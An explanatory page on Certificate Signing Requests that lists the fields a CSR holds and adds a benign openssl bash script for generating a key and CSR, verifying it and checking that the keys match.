A CSR (Certificate Signing Request) is a block of encoded text that you submit to a Certificate Authority (CA) to obtain a signed digital certificate. The CA uses the CSR to create and sign the certificate. The CSR does not contain the private key. Remember that the private key is always secret and stays with you. A certificate created from a particular CSR only works with the private key that was generated with it, so if you lose the private key, the certificate will no longer work.
So what information does a CSR contain?
- Common Name : The Fully Qualified Domain Name (FQDN) of the Server.
- Organization : Name of your company or organization.
- Organizational Unit : Department name
- City/Locality : City information
- State/County/Region : State or Region Information
- Country : Country information in ISO naming format (for example, USA is US, United Kingdom is UK, India is IN).
- Email address : Email contact information of the organization.
- Public Key : The public key of the server.
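The fields listed above can be inspected in a real request with the `openssl` command line. The script below is an added example, not code from the original page: the subject values (Example Corp, www.example.com, admin@example.com), the file names and the function names are constructed placeholders. It builds a CSR, checks its self-signature, and shows that only the private key generated for the CSR matches the public key inside it.

```shell
#!/usr/bin/env bash
# Added example: subject values and file names are constructed placeholders.
set -eu

make_key() {
  # $1 = private key path; created with owner-only permissions
  (umask 077; openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out "$1" 2>/dev/null)
}

make_csr() {
  # $1 = private key, $2 = CSR output path; one -subj component per CSR field
  openssl req -new -key "$1" -out "$2" \
    -subj "/C=US/ST=California/L=San Francisco/O=Example Corp/OU=IT/CN=www.example.com/emailAddress=admin@example.com"
}

csr_subject() {
  # Print the distinguished name stored in the CSR
  openssl req -in "$1" -noout -subject
}

csr_signature_ok() {
  # The CSR is signed with the private key; this proves possession of the key
  openssl req -in "$1" -noout -verify 2>&1 | grep -q "verify OK"
}

key_matches_csr() {
  # $1 = private key, $2 = CSR; compare the public key derived from each
  [ "$(openssl pkey -in "$1" -pubout)" = "$(openssl req -in "$2" -noout -pubkey)" ]
}

work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

make_key "$work/server.key"
make_csr "$work/server.key" "$work/server.csr"
csr_subject "$work/server.csr"

csr_signature_ok "$work/server.csr" && echo "CSR self-signature: OK"
key_matches_csr "$work/server.key" "$work/server.csr" && echo "server.key matches the CSR"

# A different private key does not match, so it cannot be used with a
# certificate issued from this CSR.
make_key "$work/other.key"
key_matches_csr "$work/other.key" "$work/server.csr" || echo "other.key does not match the CSR"

# The CSR file carries the public key only, never the private key.
grep -q "PRIVATE KEY" "$work/server.csr" || echo "no private key material in the CSR"
```

Running `openssl req -in server.csr -noout -text` on the generated file prints every field, including the public key, in readable form.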